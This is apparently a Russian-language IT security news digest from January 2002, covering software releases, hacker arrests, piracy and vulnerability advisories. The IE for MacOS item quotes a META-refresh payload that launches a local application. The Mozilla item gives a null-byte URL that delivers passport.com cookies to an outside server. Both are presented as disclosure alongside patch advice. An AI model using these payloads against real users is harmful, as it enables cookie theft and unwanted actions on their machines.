Darren Reed, автор пакетного фильтра IP-Filter, выпустил свою модификацию OpenBSD 3.0 с IP-Filter. IP-Filter поставлялся с OpenBSD до версии 2.9 включительно и в последствии был заменен на пакетный фильтр от OpenBSD-team. Замена произошла по причине несогласия Darren Reed и Theo de Raadt по вопросам ответственности за изменения, сделанные в ipf коммандой OpenBSD, а так же из-за (отчасти надуманных) лицензионных проблем. Подробности - http://groups.google.com/groups?hl=en&threadm=3c45befe%40clarion.carno.net.au& rnum=1&prev=/groups%3Fhl%3Den%26selm%3D3c45befe%2540clarion.carno.net.au
24/01/2002 Plug-n-play сервер.
IMASS - это сервер для технофобов. Он работает с ОС Linux и менее чем за пять минут определяет всю конфигурацию сети, к которой он подключен; настройки DHCP, DNS, FTP, электронной почты, совместного доступа к файлам, брандмауэра, NAT, прав доступа в Интернет и подключения к Интернет - все делается почти автоматически. Информация - http://www.dartek.com/imass
24/01/2002 Microsoft объявила пиратов террористами.
С недавнего времени правительство США начало проведение крупных операций по борьбе с компьютерным пиратством. Распространители пиратских копий программ, ранее бывшие головной болью исключительно индустрии производителей ПО, теперь приобретают иной статус, близкий к государственным преступникам или террористам. Действительно, в некоторых документах, опубликованных компанией Microsoft, содержаться предположения о связи софтверных пиратов с террористическими группировками. Согласно документам компании Microsoft по пиратству, варезные группировки препятствуют восстановлению экономики, и ставят преграды перед многими странами с точки зрения полноценного участия в мировой торговле. Связь с террористами опровергается на сайте Wired, где приводится интервью с неким российским торговцем на Митинском радиорынке. "Пират" сообщает, что зарабатывает не более 50 долларов в месяц, на которые кормит себя, жену и ребенка. "Ну и сколько у меня останется после всего этого на поддержку террористов, если бы я их поддерживал?", - спрашивает он. Подробности - http://www.compulenta.ru/news/2002/1/24/24665/
24/01/2002 Хакер, обвиняемый во взломе eBay, добровольно решил сесть в тюрьму.
Затягивание официальных процедур и строгие досудебные ограничения подстегнули обвиняемого во взломе eBay хакера Джерома Хекенкэмпа обратиться к судье с просьбой отказаться от поручительства и отправить его в тюрьму. "Несмотря на то, что я находился на свободе, наложенные на меня ограничения не давали мне чувствовать себя свободным", сообщил Хекенкэмп в интервью, данном им в государственной тюрьме Санта Клара. "И я не могу заниматься своим делом, будучи ограничен в использовании компьютеров". Хекенкэмп был заключен в тюрьму по собственному желанию после своего обращения к судье США с просьбой возвратить залог в размере 50 тысяч долларов, внесенный его другом. Арестованный хакер также отказался от своей защиты в суде, признанного эксперта по информационному законодательству Дженнифер Грэник. Более подробно - http://www.compulenta.ru/news/2002/1/23/24634/
24/01/2002 Хакер из Сургута ограбил американский банк через Интернет.
Как сообщает телеканал ОРТ, 21-летний житель Сургута со своего домашнего компьютера сумел взломать систему защиты известного американского банка и получить доступ к базе данных, в которой содержалась информация о клиентах. Полученные сведения (более полутора тысяч имен и фамилий клиентов банка, их номера счетов, суммы вкладов и прочие конфиденциальные данные) он разместил в Интернете и принялся шантажировать банк, требуя за своё молчание 10000 долларов. По словам Александра Слуцкого, начальника отдела по борьбе с преступлениями в сфере компьютерной информации ГУВД Москвы, хакер поставил банку ультиматум. "Им было прислано письмо руководству банка, в котором ставился фактически ультиматум: если в трехдневный срок они не перечислят деньги, то информация будет опубликована. И давалась ссылка на созданный им сайт, на котором находилась часть этой конфиденциальной информации", - рассказывает он. Банк вступил с вымогателем в переписку при участии ФБР. Когда выяснилось, что угрозы поступают из России, ФБР обратилось за помощью к милицейскому управлению "Р" в Москве. Но к моменту задержания взломщика, выкуп банк уже заплатил. Более того, часть денег хакер успел потратить на новое оборудование. Оперативники выяснили, что специального образования у взломщика не было. Он окончил среднюю школу, проучился полгода в институте, потом бросил. Навыки компьютерного взлома хакер приобрел, общаясь в Интернете. Подробности - http://www.ortv.ru
24/01/2002 AOL подала в суд на MS.
История о возможной покупке Red Hat корпорацией AOL Time Warner нашла свое продолжение в суде.По данным dailynews.yahoo.com AOL, отказавшись от сделки с Red Hat, обвиняет Microsoft в нарушени антимонопольного законодательства США. Подробности - http://dailynews.yahoo.com/h/ap/20020122/ts/microsoft_netscape_2.html
23/01/2002 Новая статья на www.linuxworld.com.
Nicholas Petreley в своей новой статье проводит анализ 2-х существующих решений в сфере менеджера виртуальной памяти ОС Линукс. В статье детально рассматриваются оба варианта , предложенные Andrea Arcangeli и Rik van Riel. Статья - http://www.linuxworld.com/site-stories/2002/0117.vm.html
23/01/2002 Новый документ: Оригинальное использование иконок в адресной строке браузера..
В этой небольшой заметке рассказывается о новом оригинальном методе отображения иконок в адресной строке и списке "Избранное". Оригинальность метода заключается в том, что пользователи видят разные иконки зайдя на один и тот же сайт, вместо одной, статичной иконки. Ознакомиться: http://www.uinc.ru/articles/zametki/008.shtml
23/01/2002 В Лос-Анджелесе арестованы два участника пиратской группы DrinkOrDie.
Два жителя Лос-Анджелеса были арестованы за участие в крупной группировке компьютерных пиратов, которая занималась копированием и распространением программного обеспечения, видео и другой продукции, защищенной законом об авторских правах. 29-летний Кентага Картадината и 26-летний Майк Нгуен стали первыми участниками группы "DrinkOrDie", арестованными после организованной правительством США операции по конфискации компьютеров, принадлежащих пиратским группам. Как утверждают обвинители, Картадината обслуживал систему электронной почты, а Нгуен администрировал один из файловых серверов, на которых хранилось программное обеспечение и видеозаписи. Арестованным грозит пятилетний срок тюремного заключения, штраф в размере 250 тысяч долларов и возможная компенсация убытков пострадавших компаний. Источник - http://reuters.com
23/01/2002 Анатолий Шкред опубликовал "Манифест Сети", в котором предлагает ограничить право провайдеров на ограничение доступа к определённым ресурсам.
Результатом конфликта между рядом провайдеров и обвинённом в спамерстве издательстве "Открытые системы" стал "Манифест Сети", написанный руководителем "Открытых систем" Анатолием Шкредом. В документе он излагает своё видение принципов, на которых должны строиться взаимоотношения между пользователями и провайдерами доступа к сети Интернет. Шкред предлагает запретить любые действия, ограничивающие свободный доступ к сетевым ресурсам без личного согласия пользователя, а также вывести право решать, кого блокировать, а кого нет, из ведения провайдеров. В настоящее время большинство провайдеров строят свою деятельность на основе другого регулирующего документа - ОФИСП-005. В нём чётко определяются недопустимость определённых действий, которые могут препятствовать нормальной работе сети (в частности, запрещается спам, хакерский взлом, фальсификация технической информации). "Предложенный Анатолием Васильевичем проект, являет собой иную крайность - закон джунглей, - комментирует представитель "Ростелекома" "Манифест Сети" на сайте "Независимый обзор провайдеров". - Права пользователей в нем расширены настолько, что не учитывают ни прав других пользователей, ни прав провайдера, ни технических условий предоставления доступа в сеть". Текст "Манифеста" - http://www.compulenta.ru/news/2002/1/23/24583/#manifest Ссылка на ОФИСП-005 - http://www.ofisp.org/documents/ofisp-005.html
23/01/2002 Более четверти баз данных американских банков пострадали в прошлом году от хакеров и вирусов.
Агентство Evans Data опубликовало весьма интересные данные о безопасности баз данных американских банков и финансовых организаций. Согласно проведенному среди 750 разработчиков баз данных опросу, проблемы с защитой данных испытывали около 12% компаний США и Канады, причем для банковского сектора этот показатель достиг рекордной отметки в 27%. Причиной этого следует, безусловно, считать привлекательность финансовых баз данных для хакеров, которые могут получить доступ к счетам или информации о них. На втором месте после банков идет здравоохранение и телекоммуникационная отрасль. В этих областях проблемы с безопасностью баз данных возникли у 18% компаний. Что касается причин нарушения безопасности, то здесь на первом месте находятся вирусы (40%), затем - хакерские атаки и человеческие ошибки (по 19%), а в 7% случаев проблемы были связаны с программными сбоями. Источник - http://www.compulenta.ru/news/2002/1/23/24600/
23/01/2002 Уязвимость в Internet Explorer для MacOS.
Cогласно заявлению Jass Seljamaa из Эстонии, IE5.0 для MacOS версии 9 подвержен уязвимости, позволяющей создателю Вэб-сайта запустить любое приложение на МАКе, при условии, что он знает путь к нему. Таким образом можно запустить хранитель экрана, изменить разрешение экрана, перезагрузить МАК, закрыть все окна и т.д. Единственным препятствием является то, что обозначение абсолютного пути в МАКах не совпадает с принятым в Win. Например, путь к файлу, при помощи которого можно переключить машину в энергосберегающий(спящий) режим, выглядит следующим образом: HD:System Folder:Speakable Items:Put Computer To Sleep. Автор предлагает пример эксплоита. META HTTP-EQUIV="refresh" CONTENT="1; URL= file:///Macintosh%20HD/System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep. Эта команда погасит экран и отключит жёсткие диски. Подробности - http://www.securityfocus.com
23/01/2002 Mozilla Cookie Exploit.
В последнее время очень много информации проходит по безопасности броузера Internet Explorer (см. наши новости). Однако, как оказалось и таким броузерам, как Netscape и Mozilla тоже присущи подобные баги. Вчера в списке рассылки BUGTRAQ Marc Slemko опубликовал информацию о возможности Вэб-серверов (настроенных соответствующим образом) похищать куки (cookies) для определённых доменов. Куки для доменов предназначены для того, чтобы все хосты в определённом домене (скажем microsoft.com) могли оперировать с cookies пользователя. При этом WWW-сервера с других доменов не имеют доступа к этим cookies. Cформировав запрос вида http://alive.znep.com%00www.passport.com/cgi-bin/cookies, на сервер, указанный до знака %00 (нулевой символ-используется в С-программах для прерывания строки) будут переданы cookies для домена .passport.com. Автор рекомендует проапгрейдить Netscape до версии 6.2.1, а Mozilla до 0.9.7. Описание бага - http://alive.znep.com/~marcs/security/mozillacookie/
22/01/2002 Утилиты удаления файлов в Windows без возможности восстановления не справляются со своей задачей.
Эксперт по компьютерной безопасности Курт Зифрид сообщил, что, как ему удалось установить, удаление файлов без возможности их дальнейшего восстановления с помощью встроенных в Windows 2000/XP/NT утилит не всегда даёт ожидаемый результат. В случае использования файловой системы NTFS с этим возникают проблемы. Дело в том, что эти утилиты не удаляют временные копии файлов, создаваемые многими программами. По мнению Зифрида, это серьёзная брешь в безопасности системы. При тестировании были использованы программы удаления: BCWipe version 1.x and 2.x, Eraser 5.3, SecureClean v3 build-2.0, East-Tec Eraser 2000, PGP 6.x freeware and commercial, 7.x, freeware and commercial. Если полное удаление информации является стратегически важным, Зифрид рекомендует поступить следующим образом: для удаления временных файлов можно использовать стандартную возможность очистки жесткого диска, а для уничтожения файлов прибегнуть к программам, несколько раз перезаписывающим информацию так, чтобы ранее удаленный файл восстановить оказалось невозможно. Более подробно - http://www.seifried.org/security/advisories/kssa-003.html
22/01/2002 Forum FAQ.
Теперь можно скачать наш Forum FAQ в Windows Help File формате(.CHM). Скачать можно здесь: http://www.uinc.ru/scripts/load.cgi?forum/faqs/forum-FAQ.zip
22/01/2002 QNX RtP 6.2.
Сегодняшний день ознаменовался релизом QNX 6.2 . Проект QNX был основан в 1980 году канадской компанией QNX Software Systems. Данная версия операционной системы базируется на ядре Neutrino. QNX представлен в виде готового в установке ISO образа размером 250 Mb. Подробности - http://www.osnews.com/story.php?news_id=534
22/01/2002 Интервью с Робертом Лавом.
На Linux Devices опубликовано интервью основателя и исполнительного редактора сайта Рика Лербаума (Rick Lehrbaum) с известным "ядерным" разработчиком Робертом Лавом (Robert Love), который в настоящее время занимается популярным патчем, позволяющим увеличить производительность ядра (kernel-preemption patch). В интервью затронуты такие вопросы, как роль Роберта Лава в проекте, важность данной разработки для разнообразных Linux-устройств, а также видение будущего Linux на рынке встраиваемых и десктопных систем. Интервью - http://www.linuxdevices.com/articles/AT8267298734.html
22/01/2002 Debian NetBSD.
Появился новый проект портирования Debian - Debian NetBSD. Дистрибутив представляет собой набор пакетов и окружение Debian GNU/Linux, собранный на ядре и базовых утилитах NetBSD. Впрочем пользователям Debian и NetBSD пока еще рано радоваться - возможно этот проект постигнет судьба объявленных ранее портов Debian на FreeBSD, Solaris и win32. Сайт проекта - http://debian-bsd.sourceforge.net/
22/01/2002 Russia Online открывает российским пользователям глаза.
Russia-Online решила открыть пользователям глаза на то, чем на самом деле является FreeBSD и BSD лицензия. Очень грамотно подобранный материал и знающий автор статьи блестяще сделали свое дело. Статья - http://www.rol.ru/news/it/news/02/01/21_011.htm
22/01/2002 Alan Cox покинет RH в случае его покупки AOL/Time Warner.
Alan Cox в своем письме в список рассылки linux-kernel сообщил о том, что не собирается работать в RedHat в случае покупки RedHat'а компанией AOL/Time Warner. Подробности - http://asimov.lib.uaa.alaska.edu/linux-kernel/archive/2002-Week-03/0083.html
21/01/2002 Новое в разделе наших проектов: Access Denied ScreenSaver v1.0.
Программа используется как хранитель экрана, так же она может быть использована как средство защиты вашего компьютера от других, пока вы отошли выпить чашку чая или пообедать, оставив свой компьютер включенным, для этого достаточно задать пароль в Настройках хранителя экрана. Эта программа сделана в КулХацкерском виде: осуществляется сканирование IP-адресов с заданного, и подбор пароля для входа в систему, все это сопровождается миганием "Access Denied". Особенности программы и полезные ф-ции: + Криптование пароля при парольной защите + Отображение текущего времени + Вывод статистики о использовании процессора и оперативной памяти + Двуязычный интерфейс(Русский и Английский) Скачать можно здесь: http://www.uinc.ru/scripts/load.cgi?files/agapov25/accessd.exe Посмотреть скриншот здесь: http://www.uinc.ru/files/agapov25/accessd.gif
21/01/2002 Вышел новый релиз Х-сервера для UNIX-XFree86 4.2.0.
Вышел новый релиз популярного Х-сервера для UNIX Xfree86. Добавлена поддержка новых карт, но ничего особо кардинального не сделано. Подробности - http://fileforum.betanews.com/detail.php3?fid=952715072
21/01/2002 Opera 6.0 TP 3.
Opera Software выпустила новую версию своего броузера Opera6 для Linux. В этой версии был улучшен пользовательский интерфейс и расширена поддержка html/css. Подробности - http://www.opera.com/linux/changelog/log600tp3.html
21/01/2002 Эмулятор ZX-Spectrum Glukalka v0.6.
Новая версия эмулятора некогда самого популярного в xUSSR компьютера ZX-Spectrum. В новой версии эмулятора значительно улучшена эмуляция контролера гибких дисков, добавлена эмуляция kempston mouse, добавлен полноэкранный режин, пофиксено много очень нехороших багов. Теперь на эмуляторе запускаются : Unreal megademo, игра "Поле Чудес", Real Commander, игра "Manic Miner" и многое другое. Подробности - http://sourceforge.net/projects/glukalka/
21/01/2002 Вышла пятая версия Personal Firewall Pro.
Sygate Technologies выпустила новую версию индивидуального брандмауэра Personal Firewall Pro. В Personal Firewall Pro 5.0 исправлены найденные в недавнее время уязвимые места и расширена функциональность. Новая версия реализует защиту от спуфинга и DoS. Sygate впервые предлагает полную защиту на уровне драйвера протокола, предотвращая использование вредоносными программами собственных драйверов на этом уровне. Защита на уровне операционной системы прикрывает такие дыры как недавно обнаруженная уязвимость UPnP Windows. Подробности - http://sygate.com
21/01/2002 Сисадмин, едва не угодивший в тюрьму за подключение университетских компьютеров к distributed.net, отделался штрафом и общественными работами.
Дэвиду Макоуэну, бывшему сисадмину американского колледжа Декалба, удалось избежать сурового наказания, которое грозило ему по закону. Воспользовавшись своим служебным положением и установив на компьютеры колледжа программное обеспечение для распределенных вычислений distributed.net, он ухитрился нанести своему работодателю ущерба на сумму, превышающую 400 тысяч долларов. Сеть Distributed.net сходна с SETI@Home, хотя и имеет совершенно иные задачи: вместо поиска внеземных цивилизаций, клиенты Distributed пытаются методом "грубой силы" отыскать ключ к зашифрованному по алгоритму RC5 коду. Победителю полагается 1000 долларов. Программа представляет собой заменитель скринсейвера: активизируется, когда компьютером никто не пользуется, и задействует ресурсы компьютера для математических вычислений. Как только руководство колледжа узнало о "хобби" своего сотрудника, Макоуэн был немедленно уволен. Вскоре последовал судебный иск с требованием возмещения убытков. Более того, поскольку Макоуэн фактически использовал в личных целях государственное имущество, его дело могло быть признано уголовным. В этом случае ему грозил не только нешуточный штраф, но и многолетнее тюремное заключение. Защищать неудачливого сисадмина в суде вызвался Фонд электронного фронтира (EFF). С его помощью удалось добиться судебной сделки, согласно которой Макоуэн обязуется возместить колледжу 2100 долларов и отработать 80 часов на общественных работах, "не связанных с компьютерами или высокими технологиями". Подробности - http://www.theregister.co.uk
20/01/2002 Ettercap это сниффер\перехватчик\логгер для коммутируемых(свитчевых) локальных сетей. Технология перехвата основывается на ARP poisoning и man-in-the-middle атаках между двумя хостами. Из основных возможностей программы можно отметить возможность иньекции символов в уже открытое соединение (не перебивая само соединение), таким образом можно например сэмулировать команды с клиента или ответы с сервера. Программа интегрирована в ncurses интерфейс, использовать который очень легко. Ettercap компилируется на данных платформах: Linux, FreeBSD, OpenBSD, NetBSD, Mac OS X.
Домашняя страничка программы: http://ettercap.sourceforge.net
20/01/2002 SGI передает Microsoft патенты на 3D графику.
Компания Silicon Graphics Inc (SGI) передает значительную часть принадлежавших ей патентов на 3D-технологии корпорации Microsoft. В прошлом году Microsoft заплатила SGI 62,5 миллиона долларов за некую интеллектуальную собственность, причем все подробности держались в секрете. SGI настаивает на том, что передаваемые технологии не являются ключевыми, хотя это, тем не менее, вызывает сомнение. Возможно, в дело также замешана прошлогодняя сделка между nVidia и SGI. Пока компании воздерживаются от комментариев. http://www.theregister.co.uk/content/54/23708.html
19/01/2002 Третий Service Pack для Windows 2000 решит около 800 проблем с системой. Как сообщают на сайте 3DSpotLight, в очередном обновлении для операционной системы Windows 2000, будут решены около 800 ошибок в ОС. В множестве исправлению будут и, например, более корректная работа с USB-клавиатурой, возможность захода на FTP-сервер с использованием пароля, начинающегося с пробела, утечка памяти в различных приложениях, взаимодействие системы с сетями Novell, работа с системами хранения данных и др. Выпуск Windows 2000 Service Pack 3 ожидается в первой половине этого года.
19/01/2002 На сервере www.linuxworld.com появилась новая статья Joshua Drake под названием "The kernel of pain". Материал посвящен обзору ветви ядра Linux 2.4. Автор проводит анализ решений, принятых разработчиками, рассматривает вопросы , связанные с нововведениями в системе управления виртуальной памятью. Прочитать - http://www.linuxworld.com/site-stories/2002/0114.kernel.html
18/01/2002 Альфа версия GNOME 2.0 доступна для тестирования.
Вышла альфа версия 2-го Gnome. По сравнению с Gnome 1.4, новый Gnome полностью поддерживает работу с Unicode, антиалиазинг шрифтов, содержит улучшенную поддержку горячих клавиш клавиатурной навигации и большое количество мелких улучшений пользовательского интерфейса. Подробнее - http://linuxtoday.com/news_story.php3?ltsn=2002-01-17-014-20-NW-DT-GN
18/01/2002 Microsoft изменяет курс, объявляя безопасность своим приоритетом при разработке новых продуктов. Наконец-то сотрудники Микрософта начинают понимать, что они постепенно теряют свой рынок из-за низкой безопасности своих продуктов. Во вторник Билл Гейтс разослал всем сотрудникам Микрософта письмо с призывами ставить безопасность на первое место, увеличить безопасность их продуктов, уделять этому аспекту больше времени. Остается загадкой - будут ли эти призывы услышаны или проигнорированы, как всегда?.
Подробности: http://www.compulenta.ru/news/2002/1/17/24354/ Письмо Б.Гейтса: http://www.compulenta.ru/news/2002/1/18/24426/
18/01/2002 S-Mail - защищенная электронная почта.
Из описания на их сайте: S-mail представляет собой уникальную защищенную почту, которая обеспечивает безопасную передачу зашифрованных почтовых сообщений по Интернет. Для пользователей системы S-mail вся переписка является абсолютно конфиденциальной: никто кроме отправителя и получателя не может прочитать почту, поскольку письма расшифровываются и зашифровываются непосредственно на компьютере пользователей. Пользователи S-mail защищены от любого рода вмешательства в их переписку, так как система работает на основе стандарта PGP. Однако, не все так гладко, особенно наводит на подозрение раздел Privacy на этом сайте. Там написаны не только всякие глупости (типа: "Мы используем ваш IP-адрес для того, что проводить диагностику возможных проблем с нашим сервером и наилучшим образом администрировать наш сайт"), но и другие очень странные и подозрительные вещи, так что советуем вам ознакомиться с этим разделом перед регистрацией. Ссылка - http://www.s-mail.com
17/01/2002 Интересная статья на www.linuxjournal.com.
Gianluca Insolvibile (разработчик ядра Linux начиная с версии 0.99) доступно описывает обработку ядром сетевых пакетов. Подробности - http://www.linuxjournal.com/article.php?sid=4852
17/01/2002 Ядро 2.5.3 оправдывает свой "unstable" статус.
После появления в LKML сообщений о том, что swapon не активизируется на ранней стадии загрузки системы, Alexander Viro выпустил соответствующий патч. Но не прошло и дня, как было сообщено о новой ошибке в драйвере IDE ядра 2.5.3-pre1. Источник - www.linux.ru.net
17/01/2002 Разработчиков free software могут обязать давать гарантии на своё ПО.
В США постепенно идут подвижки по закону об унифицированном обмене информациии между компьютерами (UCITA). По словам Ричарда Столмана это похоронит разработчиков free software угрозой скрытых гарантий. Источник - http://www.theregister.co.uk/content/4/23675.html
17/01/2002 Интервью с Alan Cox.
На сервере kerneltrap.com опубликовано интервью в Аланом Коксом-известным разработчиком ядра LINUX. Прочитать - http://kerneltrap.com/article.php?sid=490
17/01/2002 Хакеры впервые воспользовались уязвимостью в ОС Solaris.
Небрежность в установке патчей снова угрожает неприятностями. На этот раз речь идет о "дыре" в операционной системе Solaris, найденной два месяца назад: хакеры впервые использовали ее для взлома серверов под управлением этой ОС. Специалисты смогли проследить, как хакер вторгся на такой сервер в то время, как за ним велось наблюдение в рамках проекта Honeynet Project. Целью этого проекта является разработка средств, которые превращали уязвимые компьютеры в своего рода "мышеловки" с тем, чтобы хакерские атаки можно было документировать и детально изучать. В данном случае речь идет о банальном переполнении буфера, которому оказался подвержен Solaris. Уязвимость содержалась в компоненте системы, предназначенном для удаленного запуска приложений, и хакер этим воспользовался. Он загрузил в систему троянскую программу типа backdoor, получив таким образом возможность входить в систему когда ему заблагорассудится. Спустя пару дней, по словам специалистов, участвующих в проекте, Honeynet, хакер вернулся и закачал на сервер программу для проведения DoS-атаки, с помощью которой собирался нанести удар по нескольким чат-серверам. Подробности - http://www.compulenta.ru/news/2002/1/16/24301/
17/01/2002 Для улучшения безопасности Internet Explorer необходимо залатать дыры в Windows Media Player.
Согласно постингу в рассылке Bugtraq специалиста по компьютерной безопасности Ричарда Смита, в медиа-плеере компании Microsoft обнаружена уязвимость, делающей бессмысленной систему защиты приватности пользователя, встроенную в Internet Explorer 6. Как утверждает Смит, Windows Media Player генерирует серийный номер, который может быть считан удаленно через Интернет. Он может быть применен для отслеживания деятельности пользователя в сети. Ограничение выдачи куков по стандарту P3P в Internet Explorer 6, которым так гордилась Microsoft, помочь уже не может. Более того, серийный номер WMP является даже более надёжным способом идентификации пользователя. Ричард Смит приводит примерный HTML-код, встраивая который в страницу, можно получить уникальный номер WMP и отслеживать пользователя в дальнейшем по этому номеру. Для того, чтобы решить данную проблему, необходимо отключить генерацию серийного номера в настройках медиа-плеера. Последняя версия программы позволяет это сделать. ID также доступен в Netscape при включённом WMP-плагине. Ключ реестра в ветках HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General и HKEY_USERS\\Software\Microsoft\Windows Media\WMSDK\General c названием "UniqueID" позволяет посмотреть это значение и при необходимости изменить. Демонстрация уязвимости - http://www.computerbytesman.com/privacy/supercookiedemo.htm
17/01/2002 Microsoft собирает персональные данные тех, кто интересуется ОС Lindows.
На сайте LindowsOS, посвященном разработке операционной системы, претендующей на звание альтернативы Windows, президент компании Майкл Робертсон разместил сообщение, предупреждающее зарегистрированных пользователей, что их персональные данные были переданы компании Microsoft. Компания LindowsOS была вынуждена передать адреса электронной почты, имена и реальные почтывые адреса всех, кто когда-либо регистрировался на сайте. Данные были переданы компании Microsoft, так как софтверный гигант пытается доказать, что Lindows работает в штате Вашингтон. Доказав то, что разработчики Lindows проводят какие-либо деловые операции в этом штате, где находится главный офис Microsoft, компания получит дополнительное орудие для борьбы с торговой маркой Lindows, которая, по утверждению софтверного гиганта, нарушает права компании, будучи "сходной с торговой маркой Windows". Подробности - http://www.slashdot.org
17/01/2002 IRPAS-набор инструментов для сетевой атаки (или проверки уязвимости).
IRPAS (Internetwork Routing Protocol Attack Suite)-это набор инструментов для выполнения сетевой атаки при помощи протоколов маршрутизации (RIP, OSPF, CDP, SRP). В составе пакета также имеются различные сканеры (в том числе traceroute c использованием echo-reply, TCP_SYN). Предназначен для нахождения уязвимостей в новых реализациях протоколов маршрутизации. Лежит в tar.gz-архиве в исходных кодах. Описание и исходники - http://www.phenoelit.de/irpas/docu.html
16/01/2002 Выставка в прямом эфире на сервере Sec.Ru.
C 5 по 8 февраля 2002 г. сервер www.sec.ru проводит международный форум "Технологии безопасности". Предполагается проведение форума в прямом эфире. Во время проведения форума несколько камер будут установлены на стендах участников форума, что позволит: смотреть фото и видеорепортажи с выставки, читать последние новости с выставки, пообщаться в прямом эфире с гостями и участниками выставки. Для того, чтобы быть в курсе всех событий выставки - необходимо зарегистрироваться. Регистрация - http://expo.sec.ru
16/01/2002 Murray Stokely сообщил о доступности FreeBSD-4.5-RC1.
Версия доступна с FTP-сервера ftp.freebsd.org. Выпуск FreeBSD-4.5-RELEASE ожидается 26 января 2002 года. Источник - http://www.freebsd.org.ru/news/news200201.html
16/01/2002 Advanced TCP Logger v 3.70 - профессиональная версия TCP_LOGGER'а.
Множество всевозможных настроек, Packet Viewer, счетчик траффика. Поддерживает опции из коммандной стоки, имеется хелп. Дом. страничка программы: http://www.ntndis.com/utilities/atcp2log.htm
16/01/2002 AOL предупреждает о возможности атаки на интернет-пейджер ICQ.
Компания America Online предупреждает пользователей интернет-пейджера ICQ об обнаружении уязвимости в ранних версиях программы. Ошибка переполнения буфера в ICQ может привести к сбою программы, также с использованием уязвимости существует возможность запуска программ на удаленной машине. Компания AOL призывает всех пользователей ICQ 2000b и более ранних версий перейти на последнюю версию интернет-пейджера - ICQ 2001b, которая не подвержена данной уязвимости. Дыра в защите популярной программы была обнаружена Дэниелом Тэном, студентом университета Пенсильвании, информация об уязвимости была размещена в расслыке Bugtraq. Компания AOL, которую ранее обвинили в игнорировании сообщений об ошибках в программе AOL Instant Messenger, заявила о том, что в настоящий момент работает совместно с Дэниелом Тэном. Всем пользователям ICQ рекомендуется обновить версию программы-клиента. "Любое сообщение, полученное вами, может содержать исполняемый код, использующий уязвимость. Злоумышленники имеют возможность сделать с вашей системой что угодно", - заявил Дэниэл. Подробности - http://www.zdnet.com
16/01/2002 Переполнение буфера в BlackMoon FTP-сервере.
BlackMoon FTPd - это FTP-сервер для Win2K, WinXP. Описание - "BlackMoon is a native windows2000 and XP FTP server application with features such as virtual directories, user accounts, file resuming and passive mode transfers, multi-homed & multi-port listening, low memory and CPU usage, auto date and time activation, all the basic ftp commands and much more." Из-за некорректной проверки буфера в программном коде сервера, можно, при выполнении команд USER, PASS и CWD передать строку длиной больше 4096 байт и тем самым "свалить" сервер. Производитель выпустил новую версию продукта - v1.5, Release #2, Build 1550. Сайт BlackMoon - http://www.blackmoon.filetap.com
16/01/2002 Лог-файлы в IIS4,5 можно переписать (подчистить).
14 января в списке рассылки BUGTRAQ Nomad Mobile Research Centre опубликовал сообщение, согласно которому существует возможность переписать лог-файлы, которые ведут серверы IIS 4,5. Уязвимость присутствует в ОС: Windows NT 4.0 with SP6a, Windows 2000 Server with SP2,Windows 2000 Professional with SP2. Баг связан с неправильной реализацией функции OpenFile из Win32 API (файл открывается с параметрами FILE_SHARE_READ и FILE_SHARE_WRITE). Такой же уязвимости подвержен и NIS 2001 (Norton Internet Security 2001). Использование этой уязвимости может позволить злоумышленнику ПОСЛЕ взлома IIS-сервера "подчистить" за собой логи. Уязвимость получила номер Q315986 в Knowledge Base Microsoft. Подробности - http://www.nmrc.org/InfoAnarchy/ Рекомендации Microsoft - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/iis4cl.asp
15/01/2002 Три крупных интернет-провайдера в Казани пострадали от действий семнадцатилетнего хакера. Виновник пойман.
Как сообщает информационное агентство "Волга-Информ", три казанских провайдера серьезно пострадали от хакерской атаки. Эта криминальная история началась, когда 17-летний студент Казанского технического университета с помощью простенькой программы отсканировал широкий диапазон IP-адресов казанских пользователей и выбрал среди них компьютеры с открытым доступом к регистрационным данным для выхода в Интернет. Потенциальные жертвы получили от анонима электронные послания, замаскированные под рекламные проспекты, а изнутри начиненные устройством для распознавания регистрационного имени и пароля. Пока адресаты читали полученные письма, их индивидуальные данные возвращались к герою повествования, получавшего таким образом индивидуальный шифр интернет-пользователей, который он мог использовать по своему усмотрению, не тратя денег и не боясь быть пойманным. В результате комплекса следственных действий первооткрыватель неприметной тропинки в виртуальный мир был выявлен. Но вину свою признавать не спешил. И только когда его товарищи-подозреваемые переквалифицировались в свидетелей, компьютерный мошенник понял, что в итоге за все придется отвечать ему одному. Как явствует из протокола допроса, пароли ему сообщил через Интернет некий парень по прозвищу "Швили" - хакер, добывавший пароли незаконным путем. Кто такой "Швили", было уже не важно: к этому времени сотрудники милиции располагали солидным объемом доказательств вины первокурсника. В результате хакерской атаки пострадали три крупнейших провайдера Казани. Досталось и пользователям. Юноша умышленно выбирал фирмы и компании, чьи расходы на Интернет исчисляются крупными суммами. Общий ущерб от "работы" всей честной компании составил ни много ни мало 40 тысяч рублей. Подробности - http://www.compulenta.ru/news/2002/1/14/24188/
15/01/2002 Новая статья: Написание экстра-маленьких Win32 приложений на С++ от 1 КБ используя лишь API. Данный документ описывает способ создания Win32 программ, при котором можно добиться размера exe файла от 1 Kb, на примере программы WindowsHider. Также описаны подводные камни, которые могут встретиться на пути при таком необычном проектировании.
Ознакомиться можно здесь: http://www.uinc.ru/articles/28/index.shtml
15/01/2002 Уязвимость в сервисе, управляющем подпроцессами CDE (dtspd).
Информационный центр CERT опубликовал пресс-релиз, в котором была представлена уязвимость в сервисе dtcpd, управляющем процессами CDE. CDE (Common Desktop Environment) - это Интегрированный GUI, которые применяется на многих UNIX-операционных системах (HP-UX, Solaris, Linux etc.). Cервис управления субпроцессами CDE (dtspd) - это сетевой демон, который принимает запросы от клиентов на удалённое выполнение команд и запуск приложений. Обычно он "живёт" на порту 6112/tcp и запускается из inetd (xinetd) c root-привилегиями. В разделяемой библиотеке, которую использует dtspd существует уязвимость, которая приводит к переполнению буффера (при посылке данных больше 4К) и возможному получению суперпользователя на уязвимой системе. CERT рекомендует до выхода патча перекрыть доступ к этому демону - либо снять этот сервис из inetd (xinetd), либо прекрыв доступ к порту 6112 на внешнем файрволле. Подробности - http://www.cert.org/advisories/CA-2002-01.html
15/01/2002 Новая версия программы sudo-1.6.4.
Выпущена новая версия утилиты sudo-программы, которая позволяет администратору сконфигурировать программы для определённых пользователей, чтобы они могли запускать их с привилегиями root без знания root-пароля. Исправлены некоторые баги по безопасности и добавлены некоторые новые фичи. Подробности - http://www.sudo.ws/sudo/dist/
15/01/2002 Подробности уязвимости IE, которая позволяет загружать приложения автоматически.
